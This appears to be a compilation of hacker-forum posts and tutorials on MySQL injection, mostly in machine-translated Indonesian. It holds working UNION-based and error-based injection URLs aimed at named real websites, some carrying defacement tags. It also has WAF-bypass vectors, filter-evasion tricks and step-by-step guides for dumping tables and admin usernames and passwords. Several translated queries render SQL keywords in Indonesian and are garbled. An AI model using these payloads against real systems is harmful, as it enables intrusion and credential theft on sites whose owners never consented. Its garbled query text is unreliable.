228My Query # : http://www.santaanazoo.org/supportus.php?cat=999999.9'/*!/**/UNION/**/SELECT*/ 1,2,0x3c63656e7465723e496e6a6563742062792045784c696e65653c63656e7465723e,Concat(0x3c63656e7465723e3c696d67207372633d2768747470733a2f2f692e696d6775722e636f6d2f6a544e69514d722e6a706727206865696768743d2731323025272077696474683d363025273e,0x3c62723e,0x75736572203e3e3e20,user/**x**/(),0x3c62723e,0x6461746162617365203e3e3e20,database/**x**/(),0x3c62723e,0x76657273696f6e203e3e3e20,@@version,0x3c62723e,0x686f73746e616d65203e3e3e20,@@hostname,0x3c62723e,0x706f7274203e3e3e20,@@port,0x3c62723e,0x62617365646972203e3e3e20,@@basedir,0x3c62723e,0x64617461646972203e3e3e20,@@datadir,0x3c62723e,0x55554944203e3e3e20,UUID(),0x3c62723e),5--+
229
230Erik Hutabarat Query # : http://www.santaanazoo.org/supportus.php?cat=membership_renewal%27+union+select+1,2,3,concat(%27<h1>Handsomeware</h1>%27,0x3c696d67207372633d2268747470733a2f2f312e62702e626c6f6773706f742e636f6d2f2d314851736e794749476f732f56343364746961394755492f4141414141414141414d302f5f714136316f6b43424e73464270466433444461514a4135753748487a554a5f41434c63422f73313630302f37393736366531663961663732623066353737373163363233313664646339312e676966222f3e,user(),0x3a,database(),0x3a,version(),%27<br>%27,@@hostname,@@port,%27<br>%27,@@basedir,0x3a,@@datadir,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))),5,6,7,8,9,10,11--+-
231
232Udje Query # : http://www.santaanazoo.org/supportus.php?details=74%27=70=70%20Union%20Select%201,2,Concat(0x3c63656e7465723e3c696d67207372633d2768747470733a2f2f696d6167652e6962622e636f2f6e78526d75792f69636f6e312e706e6727206865696768743d27313825272077696474683d313825273e,0x3c62723e3c666f6e7420636f6c6f723d233133304534363e3c68323e2f2a2120496e6a6563746564206279204d722e34723748753132202a2f3c2f68323e,0x3c62723e4d7953514c2056657273696f6e203a20,version(),0x3c62723e4461746162617365203a20,database/**x**/(),0x3c62723e55736572203a20,user(),0x3c62723e486f73746e616d65203a20,@@hostname,0x3c62723e506f7274203a20,@@port,0x3c62723e4f53203a20,@@version_compile_os,0x3c62723e55554944203a20,uuid(),0x3c62723e56657273696f6e203a20,@@version_compile_machine,0x3c62723e546d70446972203a20,@@tmpdir,0x3c62723e44617461446972203a20,@@datadir,0x3c62723e42617365446972203a20,@@basedir,0x3c62723e53796d6c696e6b203a20,@@Global.have_symlink,0x3c62723e53534c203a20,@@Global.have_ssl,0x3c62723e),4,5,6,7,8,9,10,11--%20-
233
234Fredley Antony Query # : https://www.santaanazoo.org/supportus.php?cat=membership%27+and+false+union+select+1,2,concat(0x3c696d67207372633d2268747470733a2f2f65646d6c692e636f6d2f77702d636f6e74656e742f75706c6f6164732f323031382f30342f363230783331302e6a7067222f3e20,0x496e6a6563746564206279206d33333769676874,0x3c62723e4d7953514c2056657273696f6e203a3a20,version(),0x3c62723e43757272656e742055736572203a3a20,user(),0x3c62723e,(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)),4,5,6,7,8,9,10,11--%20-
235
236Amir Hossan Rahel Query # : http://www.santaanazoo.org/supportus.php?details=.8%27%20union%20select%201,2,concat(0x696e6a65637465642062792068756e74657220696e6a6563746f72,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,@@datadir,0x3c62723e,@@port,0x3c62723e,uuid(),0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),4,5,6,7,8,9,10,11--+
237
238Diky Alveira Query # : https://www.santaanazoo.org/supportus.php?cat=-corporateMembership%27%20UNION%20SELECT%201,2,3,/*!50000CONCAT*/(%27<br>%27,%27<font%20size="5"%20color="blue">%20Injected%20By%20Raymond7%27,%27</font>%27,%27<br><br>%27,%27<img%20src="https://i.imgur.com/ShUBv3I.jpg"%20height="230"%20width="230">%27,%27<br><br>%27,%27<font%20color="red">%20"%20Jika%20menyakitiku%20adalah%20jalan%20yang%20memang%20akan%20membuatmu%20bahagia,%20maka%20lakukanlah%20"%20%27,%27</font>%27,%27<br><br>%27,%27<font%20color="green">%20Version%20::%20%27,version/**_**/(),%27<br>%27,%27<font%20color="green">%20Port%20::%20%27,/*!13337@@port*/,%27</font>%27,%27<br>%27,%27<font%20color="green">%20Hostname%20::%20%27,/*!13337@@hostname*/,%27</font>%27,%27<br>%27,%27<font%20color="green">%20Database%20::%20%27,database/**_**/(),%27</font>%27,%27<br>%27,%27<font%20color="green">%20User%20::%20%27,user/**_**/(),%27</font>%27,%27<br>%27,%27<font%20color="green">%20GLOBAL%20SYMLINK%20::%20%27,/*!13337@@GLOBAL.have_symlink*/,%27<br>%27,%27<font%20color="green">%20DATA%20DIR%20::%20%27,/*!13337@@datadir*/,%27</font>%27,%27<br>%27,%27<font%20color="green">%20BASE%20DIR%20::%20%27,/*!13337@@basedir*/,%27</font>%27,%27<br>%27,%27<font%20color="green">%20TMP%20DIR%20::%20%27,/*!13337@@tmpdir*/,%27</font>%27,%27<br>%27,%27<font%20color="green">%20GLOBAL%20SSL%20::%20%27,/*!13337@@GLOBAL.have_ssl*/,%27</font>%27,%27<br>%27,%27<font%20color="green">%20SYSTEM%20UUID%20::%20%27,UUID(),%27</font>%27,%27<br>%27,%27<font%20color="green">%20Current%20Database%20::%20%27,schema(),%27</font>%27,%27<br>%27,%27<font%20color="green">%20COMPILE%20OS%20::%20%27,@@VERSION_COMPILE_OS,%27</font>%27,%27<br>%27,%27<font%20color="green">%20BOLLEAN%20SYNTAX%20::%20%27,@@FT_BOOLEAN_SYNTAX,%27</font>%27,%27<br>%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),5--%20-
239
240
241
242solution of my challenge
243me and master Revo Riwansyah query is same so i posting both of us query
244
245https://www.massagetoday.com/mpacms/mt/article.php?id=-1463+union+select+1,2,3,4,5,6,7,8,9,10,concat('Injection by Hunter injector',0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database()),12,13,14,15,16,17,18,19,20,21,22,23,24/*
246
247https://www.massagetoday.com/mpacms/mt/article.php?id=-1463+union+select+1,2,3,4,5,6,7,8,9,10,concat(%27Injection%20by%20R3V0%27,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database()),12,13,14,15,16,17,18,19,20,21,22,23,24/*
248
249
250http://metrogroup.co.id/~pdwarchi/news.php?id=26' =75 =75 Union Select 1,2,3,Concat("Your_Name~<br>",(select variable_value from information_schema.session_variables where variable_name like 0x76657273696f6e)),5,6,7,8,9,10,11,12,13-- -
251
252Version without text "version" :
253(select variable_value from information_schema.session_variables where variable_name like 0x76657273696f6e)
254
255Happy Inject...
256
257and x(point(0,0)),
258 and mod(9,4)
259
260query : http://www.microfinance.lk/member_profile.php?id=-1'+/*!50000UNION*/+/*!50000ALL*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,/*!50000concat*/('<img src="https://res.cloudinary.com/teepublic/image/private/s--_x0vkCVL--/t_Preview/b_rgb:191919,c_limit,f_auto,h_313,q_90,w_313/v1525736660/production/designs/2664250_0" height="300" </img>','<br>','INJECTED BY RESIS-07','<br>',user(),'<br>',@@version,'<br>',@@hostname,'<br>',database()),19,20,21,22--+-
261
262
263Balancing Code
264integer based ::
265
266--
267-- -
268--+-
269)--
270)-- -
271)--+-
272))--
273))-- -
274))--+-
275;%00
276) ;%00
277));%00
278%23
279%60
280%90
281and 1=1
282and '1'='1
283and (1)=(1
284php?id=(1) -- -
285
286string based ::
287
288'--+-
289')-- -
290')--+-
291'))-- -
292'))--+-
293';%00
294');%00
295'));%00
296'%23
297'%60
298'%90
299' and 1=1
300' and '1'='1
301' and (1)=(1
302php?id=(1') -- -
303
304string based double quotes ::
305
306"-- -
307"--+-
308"%23
309")-- -
310")--+-
311"))--+-
312";%00
313") ;%00
314"));%00
315"%60
316"%90
317" and 1=1
318" and '1'='1
319" and (1)=(1
320php?id=(1") -- -
321
322VGVydXMgbWF1bnlhIGFwYT8gQUJHIEJ1Z2lsIQ==
323Thanks to : Dimas Fakonntl
324
325Bagaimana menemukan Kolom yang Rentan? 25 25 25
326ANS: -
327Teknik 1: -
328gunakan -> id = -1 union pilih 1,2,3,4,5--
329use -> id = 1111/9999 / null / bybysql union pilih 1,2,3,4,5--
330use -> id = .1 / 1.2 / 12.4 union pilih 1,2,3,4,5--
331
332Catatan: - Saya menggunakan null dan bybysql. Tidak bingung dengan mereka, kamu bisa menggunakan watever u like means menggunakan data yang tidak ada [Thanks to Hack Forum]
333
334Teknik ke-2: - Parameter Salah
335Di sini Parameter Salah berarti meletakkan sesuatu yang membuat respons yang salah ke dalam PARAMETER SQL kami
336(a) 1 = 2, 1 = 0
337use -> id = 1 atau 1 = 2 union pilih 1,2,3,4,5--
338use -> id = 1 atau 1 = 0 union pilih 1,2,3,4,5--
339
340(B) Juga dapat kita gunakan memiliki, seperti, <>
341gunakan -> id = 1 memiliki / HAVING 1 = 2 union pilih 1,2,3,4,5--
342gunakan -> id = 1 1 suka / LIKE 2 union pilih 1,2,3,4,5--
343use -> id = 1 1 <> 1 union pilih 1,2,3,4,5--
344use -> id = 1 {having / and} 1 like 2 union pilih 1,2,3,4,5--
345use -> id = 1 {having / and} 1 <> 1 union pilih 1,2,3,4,5-- / * gunakan apakah memiliki atau dan
346
347Juga Anda dapat menggunakan dan pernyataan palsu / DAN SALAH
348gunakan -> id = 1 dan false union pilih 1,2,3,4,5--
349
350Teknik ke-3: - Bagi dengan 0 berarti -> / 0 dan + div + 0
351use -> id = 12/0 union pilih 1,2,3,4,5--
352
353gunakan -> id = 12 + div + 0 + union pilih 1,2,3,4,5--
354
355Teknik ke-4: - Perhatikan dengan seksama, atau gores kode sumber HTML
356
357Jumlahnya dapat ditampilkan di mana saja, ketika agak kasar, cukup ubah kueri untuk membuat semuanya lebih terlihat seperti sesuatu
358
359http://somesite.net/b.php?id=12/0 union pilih 1111,2222,3333,4444,5555--
360
361Di atas kita menggunakan 1111, 2222 bukannya 1,2 masing-masing
362
363Setelah menulis kode kode sumber terbuka, cari 'Nomor Kolom' seperti 1111,2222,3333,4444,5555 dengan menggunakan (CTRL + F: - Untuk menemukan sesuatu dalam kode sumber) Kemudian periksa di mana nomor dat muncul dalam kode sumber
364
365Terkadang nomor ditampilkan pada judul halaman.
366
367Ketika Anda mendapatkan kolom yang rentan maka Anda ingin menampilkan versi, pengguna, basis data atau beberapa bagian html untuk dapat dilihat di halaman. Jadi, 4 langkah. Ikuti Langkah-langkah ini: -
368
369i.) id = -1 union pilih 1111,2222, concat (0x223e, @@ version, 0x3c696d67207372633d22), 4444--
370Dimana
371223e => ">
3723c696d67207372633d22 => <img src = "
373* Ingat kita menggunakan 0x sehingga dat diatas kode hex berfungsi
374
375ii.) 4 cetak nama kami
376id = -1 union pilih 1111,2222, concat (0x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d), 4444--
377Dimana
3780x5c223e3c666f6e7420636f6c6f72203d207265642073697a653d343e41414b4153483c2f666f6e743e3c212d2d => \ "> <font color = red size = 4> AAKASH </ font> <! -
379
380Teknik ke-5: -
381U mencoba semua teknik di atas tetapi stille tidak bisa mendapatkan kolom rentan maka u juga dapat menggunakan teknik kelima ini .... Wats baru dalam teknik ini Lihat: -
382
383Anda dapat menggunakan serikat pilih 1,2,3,4,5-- sebagai serikat (pilih 1,2,3,4,5) -
384gunakan: - id = -2 union (pilih 1,2,3,4,5) -
385/ * Jika Anda melihat vul col seperti 3 kemudian
386
387gunakan: - id = -2 union (pilih 1,2,333 (4 cek) / @@ versi, 4,5) -
388
389Teknik 6: - Parameter Benar
390
391gunakan -> id = 1 + di mana + 1 = 1 union pilih 1,2,3,4,5--
392use -> id = 1 + dan + 50 = 50 union pilih 1,2,3,4,5--
393use -> id = 1 = 75 = 75 union pilih 1,2,3,4,5--
394
395Teknik 7: - Brute memaksa kolom / * Terima kasih kepada Master saya Devilhunter Dante
396Frnds ketika Anda tidak dapat menemukan jumlah kolom maka Anda juga dapat menggunakan teknik ini. Dengan teknik ini tidak hanya Anda menemukan sejumlah kolom, Anda juga mendapatkan kolom yang rentan.
397Ikuti langkah-langkah berikut
3981st do -> union pilih 1--
3992nd do -> union pilih 1,2--
4003rd do -> union pilih 1,2,3--
4014th do -> union slect 1,2,3,4--
4025th do -> union pilih 1,2,3,4,5--
403
404© AKDK
405
406~ h
407
408
409
410Error Based Dump In One Shot (DIOS) - Oleh Ph.h4rh4r
411
412Kami Telah Mendiskusikan di Tutorial Kami Sebelumnya Tentang Injeksi SQL Berbasis Kesalahan.
413Dalam Tutorial Ini Anda Akan Mempelajari Cara Membangun Error Based Dump In Shot (DIOS).
414Seperti yang Kita Ketahui Bahwa dalam Error Based Query, Kami Memberikan Perintah Kami Ke server dan Memberikan Kami menghasilkan kesalahan.
415
416Jika Kami Ingin Mendapatkan versi () maka kami Berikan Permintaan Seperti ini.
417
418http://www.FakeSite.com/news.php?id=11 atau 1 grup oleh concat_ws (0x3a, versi (), lantai (rand (0) * 2)) memiliki min (0) atau 1-- -
419
420kami mendapatkan versi tercetak di halaman. versi = 5.5.42-cll
421
422Sekarang Mari kita dapatkan nama Database Primer.
423http://www.FakeSite.com/news.php?id=11 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (database () sebagai char), 0x7e)) dari information_schema.tables di mana table_schema = database () limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
424dan Ini Database Primer kami.
425
426ini nama Database Primer "kkbaketo_wordpress" jadi ini adalah nama Database Primer kami. jika kita ingin mendapatkan yang lain kita biasanya Meningkatkan LIMIT 0,1 hingga LIMIT 1,1
427
428Tetapi kita juga bisa mendapatkan semua Database tanpa menggunakan LIMIT.
429Inilah SYNTAX untuk Mendapatkan Semua Database.
430
431(SELECT! X- ~ 0.FROM (SELECT (concat (0x3a3a3a, (pilih group_concat (schema_name) dari information_schema.schemata))) x) a)
432
433Sekarang Tambahkan SYNTAX ini untuk Dapatkan semua Databasis.
434
435http://www.FakeSite.com/news.php?id=(SELECT!x-~0.FROM(SELECT(concat(0x3a3a3a,(select group_concat (schema_name) dari information_schema.schemata))) x) a) - - -
436
437dan ini Database kami.
438
439information_schema, kkbaketo_wordpress
440
441Langkah selanjutnya adalah Dapatkan The Tables.
442Inilah contohnya.
443http://www.FakeSite.com/news.php?id=11 atau 1 grup oleh concat_ws (0x7e, (pilih table_name dari information_schema.tables di mana table_schema = database () limit 0,1), floor (rand (0) * 2)) memiliki min (0) atau 1-- -
444dan kami Dapatkan Nama tabel di bawah Respons kesalahan ::
445
446Kami Hanya MENDAPATKAN satu Nama TABEL. kkbaketop_category
447
448Ini adalah nama Tabel Pertama Kami. Kita Dapat Mendapat Satu Selanjutnya dan Yang Lain dengan Meningkatkan Nilai LIMIT 0,1 hingga LIMIT 2,1 LIMIT 3,1
449Kami Meningkatkan BATAS untuk Tabel.
450LIMIT 0,1 untuk tabel 1.
451LIMIT 1,1 untuk tabel ke-2.
452Seperti yang Kita Ketahui bahwa kita Dapat DUMP Semua Tabel dan Kolom Dalam injeksi BERBASIS UNION.
453dalam ERROR BASED Dump dalam satu Shot (DIOS) kita tidak dapat Dump All Tables / Columns seperti UNION BASED Injection.
454Tapi Kita Bisa Dapatkan Beberapa Tabel / Kolom dari Basis Data dengan MEMBANGUN Kueri kami.
455
456
457Berikut ini adalah SYNTAX Kami untuk Tabel.
458
459(pilih group_concat (table_name) dari information_schema.tables di mana table_schema = database ())
460
461Sekarang tambahkan SYNTAX ini di DIOS Query kami.
462
463(SELECT! X- ~ 0 ./*! 50000FROM * / (/ *! 50000SELECT * / (/ *! 50000concat_ws * / (0x3a3a3a, (pilih group_concat (table_name) dari information_schema.tables di mana table_schema = database ()))) x) a)
464
465
466DIOS Query kami Siap untuk Tabel.
467
468http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat (table_name) dari information_schema.tables di mana table_schema = database ()))) x) a) - -
469
470Ini Meja Kami.
471
472kkbaketop_admin, kkbaketop_category, kkbaketop_content, kkbaketop_contentOld, kkbaketop_meta, kkbaketop_navigation, kkbaketop_product
473
474Kami Juga dapat HTML TAG untuk menampilkan Semua Tabel di Saluran Baru.
475HTML TAG = <BR>
476kita bisa menggunakannya dengan mengkodekannya di HEX Value atau Menempatkan Single Quote Sebelum dan Sesudah TAG HTML.
477HEX Value = 3c42523e kita harus menggunakan 0x sebelum Nilai HEX untuk Menggunakan TAG HTML.
478HEX Value = 0x3c42523e
479Menempatkan Kutipan Tunggal = '<BR>'
480
481PUT TAG HTML Sebelum Table_name.
482Hmmm sekarang Memungkinkan Tambahkan Tag ini ke Error Based DIOS Query kami dan jalankan.
483
484http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat ('<BR>', table_name) dari information_schema.tables di mana table_schema = database ()))) x) a) - -
485
486Sekarang Semua Tabel berada dalam garis BARU.
487
488Langkah Berikutnya adalah Kita Harus Mendapatkan Kolom.
489
490Ini adalah SYNTAX untuk Kolom.
491
492(pilih group_concat (3c42523e, table_name, 0x3a, column_name) dari information_schema.columns di mana table_schema = database ())
493
494Tambahkan SYNTAX ini di DIOS Query dan Execute it untuk Mendapatkan Kolom dari Setiap Tabel.
495
496Dan berikut adalah DIOS FINAL Pertanyaan untuk Tabel dan Kolom Berbasis Kesalahan dalam satu SHOT.
497
498http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat ('<BR>', table_name, 0x3a, column_name) dari information_schema.columns di mana table_schema = database ()))) x) a) - -
499©
500~ Ph.h4rh4r
501
502
503Error Based Injection -Tutorial (Ph.h4rh4r)
504Setelah Union Based Injection Dalam Tutorial ini Anda Akan Mempelajari Error Based SQL Injection.
505Bagaimana Anda Akan Memahami Bahwa WebSite Target kami dalam Injeksi Berbasis Kesalahan. ??
506Hmm Sementara kita adalah Situs Suntik, Dan Hitung Jumlah Total Kolom dan Kemudian Bangun Query SQL Berbasis Serikat.
507
508Kami mendapat 6 Jumlah Kolom. dan UNION BASED Query kami.
509
510http://www.target.com/index.php?id=-1 Union Select 1,2,3,4,5,6-- -
511
512Ketika kami Melaksanakan Query Berbasis Persatuan kami tidak memberikan kami Nomor Kolom yang Rentan yang Dicetak di Halaman Web atau dalam HTML.
513Ini Memberi Kita Pesan Kesalahan.
514
515Pernyataan SELECT yang digunakan memiliki jumlah kolom yang berbeda
516
517Kadang-kadang Situs TARGET tidak Memberikan Nomor Kolom yang Rentan dan Juga Tidak Ada Jenis Kesalahan. Situs-situs tersebut juga error SQL / Double Query SQL injection.
518Jadi Kami Diolah Selanjutnya Dengan Error Based Queries.
519
520Langkah pertama adalah Untuk Mendapatkan Versi.
521Berikut adalah Query Berdasarkan Kesalahan Untuk Dapatkan Versi.
522
523http://www.target.com/index.php?id=1 atau 1 grup oleh concat_ws (0x3a, versi (), lantai (rand (0) * 2)) memiliki min (0) atau 1-- -
524
525dan kami Akan Mendapatkan Versi Dicetak di WebPage.
526
527
528Langkah kedua adalah Untuk Mendapatkan Nama Database.
529
530Sekarang Mari Periksa Nama Database Saat Ini.
531Situs Web Dapat Memiliki Lebih dari 2, 3, atau 5 Basis Data. Jadi Kami Gunakan BATAS untuk mendapatkan semua Database.
532
533LIMIT 0,1 LIMIT 1,1 LIMIT 2,1 LIMIT 3,1
534
535Inilah Pertanyaan Kami Untuk Mendapatkan Basis Data.
536
537http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (database () sebagai char), 0x7e)) dari information_schema.tables di mana table_schema = database () limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
538
539
540Langkah ketiga adalah untuk mendapatkan tabel.
541Sekarang Kita Harus Mendapat Tabel. Seperti Kami Ingin Tabel Dari Database Primer.
542Berikut Ini Query Untuk Tabel Dari Database Primer.
543http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (table_name sebagai char), 0x7e)) dari information_schema. tabel di mana table_schema = database () limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
544
545Tingkatkan Nilai Batas sebagai LIMIT 0,1 hingga LIMIT 1,1 LIMIT 2,1 LIMIT 3,1
546Sampai Anda Mendapatkan Nama Tabel yang Diinginkan Anda.
547
548Langkah ke 4 adalah Mendapatkan Nama Kolom Dari Nama Tabel Bertarget Kami.
549Sekarang Kita Harus Mendapatkan Nama Kolom Dari Nama Tabel.
550Kami Mendapat Tabel Of Admin.
551Jadi Mari Dapatkan Kolom Dari Admin Tabel.
552
553Berikut Ini Query Untuk Mendapatkan Nama Kolom Dari Tabel Admin.
554
555http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (column_name sebagai char), 0x7e)) dari information_schema. kolom di mana table_name = 0xADMIN membatasi 0,1), lantai (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
556
557Untuk Mendapatkan Kolom Dari Tabel Admin kita Harus Mengkodekannya Di HEX dan Kemudian Kita Dapat Melaksanakan Permintaan Kita.
558Inilah BAGIAN dalam Pertanyaan Kita.
559
560Table_name = ADMIN
561Inilah Nilai HEX dari ADMIN = 61646d696e
562Dan Letakkan Dengan 0x untuk Membuat Kueri yang Benar.
563
564Table_name = 0x61646d696e
565
566Dan Inilah Kueri.
567http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (column_name sebagai char), 0x7e)) dari information_schema. kolom di mana table_name = 0x61646d696e limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
568
569Tingkatkan Nilai BATAS menjadi BATAS 0,1 LIMIT 1,1 LIMIT 2,1
570sampai kita Dapatkan Nama Kolom Seperti Nama Pengguna dan Kata Sandi.
571
5725Th Step Is to Extracting Data From Columns.
573Setelah Kami Dapatkan Nama Kolom Seperti Nama Pengguna Dan Kata Sandi.
574Langkah Berikutnya Adalah Mengeluarkan Data Dari Kolom Ini.
575
576Berikut ini adalah Query Untuk Mengekstrak Data dari Kolom.
577
578http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (concat (COLUMN_NAME_1,0x3a, COLUMN_NAME_2) sebagai char) , 0x3a)) dari batas TABLENAME 0,1), lantai (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
579
580KAMI Letakkan TABLENAME = Admin
581Dan
582Column_name_1 = nama pengguna
583Column_name_2 = kata sandi
584
585Jadi, inilah Query FINAL.
586
587http://www.target.com/index.php?id=1 dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (concat (nama pengguna, 0x3a, kata sandi) sebagai char) , 0x3a)) dari batas admin 0,1), lantai (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - -
588
589Dan Kami Dapatkan Nama Pengguna dan Kata Sandi ADMIN yang tercetak di Halaman.
590
591~ Ph.h4rh4r
592
593
594
595Amir Hossan Rahel
596http://www.realinstruments.ca/gallery.php?id=7 /*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7--+
597hello sir how I can bypass 'union select' please help me or post it your page thank you
598
599Real Instruments - Photo Gallery - 161 Maypoint Rd, Charlottetown, PEI
600realinstruments.ca
6011 · Suka · Tanggapi · Balas · Laporkan · 23 Jan
602SQLI Tutorial - Beginners
603http://www.realinstruments.ca/gallery.php?id=.7 unUNIONion seSELECTlect 11111111,2,3,4,5,6,7-- -
604
605Real Instruments - Photo Gallery - 161 Maypoint Rd, Charlottetown, PEI
606realinstruments.ca
607Suka · Tanggapi · Balas · Laporkan · 23 Jan
608SQLI Tutorial - Beginners
609SQLI Tutorial - Beginners
610No problem
611SQLI Tutor... membalas · Lihat semua 2 balasan
612
613
614
615Modsecurity WAF Bypass vectors
616
617--new version--
618id=@:=(-- a %0a select 123 from {f table})|0.1union-- a %0a select+1,@,3
619id=@:=(-- a %0a select 123 from {f table})*.9union/*!%0aselect 1,@,3*/
620id=@:=(%23 a %0a select 123 from {f table})-\Nunion%23 a %0a select+1,@,3
621id=@:=(%23 a %0a select 123 from ((table)))/1e0union%23 a %0a select+1,@,3
622id=@:=(%23 a %0a select 123 from ((table)))/1e0union%a0(select 1,@,3)
623
624--old version--
625id=1-.0union distinctrow select 1,2,3 from {f table}
626id=-1 /*!50000union*/ select 1,2,.3from table
627id=-1e0union distinct select 1,2,3e0from table
628id=\Nunion (select 1,2,\Nfrom table)
629id=.1union distinct select sql_cache 1,2,3 from table
630
631-h
632
633mysql injection concat() replacements
634
635select export_set(1,version(),user(),' : ',2);
6365.1.7 : my_user
637
638select export_set(1,version(),export_set(1,user(),schema(),' : ',2),' : ',2);
6395.1.7 : my_user : my_db
640
641select make_set(7,version(),user(),schema());
6425.1.7,my_user,my_db
643
644select replace(make_set(7,version(),user(),schema()),',',' : ');
6455.1.7 : my_user : my_db
646
647select insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ');
6485.1.7 : my_user
649
650select insert(insert(schema(),length(schema())--1,0,insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ')),length(schema())--1,0,' : ');
6515.1.7 : my_user : my_db
652
653select replace(replace(replace('!?$','!',version()),'?',' : '),'$',user());
6545.1.7 : my_user
655
656select replace(replace(replace(replace('!?$?^','!',version()),'?',' : '),'$',user()),'^',schema());
6575.1.7 : my_user : my_db
658
659select lpad(lpad(user(),@x:=length(user())--3,' : '),@x--length(version()),version())
6605.1.7 : my_user
661
662select lpad(lpad(lpad(lpad(schema(),@x:=length(schema())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(version()),version());
6635.1.7 : my_user : my_db
664
665select rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user());
6665.1.7 : my_user
667
668select rpad(rpad(rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(schema()),schema());
6695.1.7 : my_user : my_db
670
671group_concat() without comma-
672select (select group_concat(a separator ' : ') from (select version()a union select user() union select schema())x);
6735.1.7 : my_user : my_db
674
675concat() waf bypass-
676/*!50000group_coNcat(*/)
677/*!50000coNcat(*/)
678`coNcat`%0a%0b%0c%0d%a0()
679{snoopdogg concat()}
680{s {n {o {o {p {d {o {g {g`coNcat`()}}}}}}}}}
681{s {n {o {o {p {d {o {g {g`coNcat`/*!50000(*/)}}}}}}}}}
682{s {n {o {o {p {d {o {g {g`coNcat`/*!50000 /*! /*!40000 /*! /*!(*/((((1 %23aaa%0a )))))}}}}}}}}}
683concat-- a%0a()
684concat%23aaaaaaaaaa..........%0a(%23aaaaaaa.........%0a)
685concat/**x**/()
686
687
688
689waf bypass with %75nion %73elect
690redirect = bypass with And 1<1 or add @ befor variable number like =@64' or =@'
691there redirect with dot in =.64' bypass by add @ like =@64' and 0 union select
692
693~h
694
695
696Multi-Query-Injection
697
698id=1-- -' our query-- -
699id=1%23' our query -- -
700id=1 union select null,null,null-- -' our query %23
701
702=1 ;%00 ' and 0 union select 1 ;%00!
703=1 -- - ' and 0 union select 1 -- -%
704=1 -- - ' or 1 union select 1,2 limit 2 -- -
705
706-----------------------------------------------------------
707Other Method
708
709=1' in boolean mode) UNION SELECT 1,2-- -
710=1' group by 1 union select 1,2-- -
711=1' procedure analyse() union select 1,2-- -
712=1) having 1=0 union select '11111' from dual -- - Where 0 %23
713=1 union select 1 LIMIT 0,1-- -
714'=0=column union select version() limit 1-- -
715
716~h
717
718
719Error based basic Tidak terlalu detail
720Cara pertama =====>
721+ DAN (SELECT COUNT (*) FROM (SELECT 1 UNION SELECT null UNION SELECT! 1) x GROUP oleh CONCAT ((versi SELECT () FROM information_schema.tables LIMIT 0,1), FLOOR (RAND (0) * 2)) )
722Cara kedua ====> packerss.in/review.php?id=260+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3) x + grup + oleh + concat (mid ((pilih + concat_ws (0x7e, versi (), 0x7e) + dari + information_schema.tables + limit + 0,1), 1,25), floor (rand (0) * 2))) a) -
723===>
724Database ===> packerss.in/review.php?id=260%20+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3) x + grup + oleh + concat (mid ((pilih + concat_ws (0x7e, group_concat (schema_name), 0x7e) + dari + information_schema.schemata% 20limit + 0,1), 1,25), floor (rand (0 ) * 2))) a) -
725==> Masukan 'informasi' duplikat
726skema, packer1 'untuk kunci' grup_
727kunci'
728tabel ===>
729packerss.in/review.php?id=260%20+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group + dengan + concat (mid ((pilih + concat_ws (0x7e, group_concat (table_name), 0x7e) + dari + information_schema.tables% 20where% 20table_schema = database ()% 20limit + 0,1), 1,25), lantai ( rand (0) * 2))) a) -
730===> Masukan duplikat 'tambah, admin, astro_
731ques, astr1 'untuk kunci' group_key '
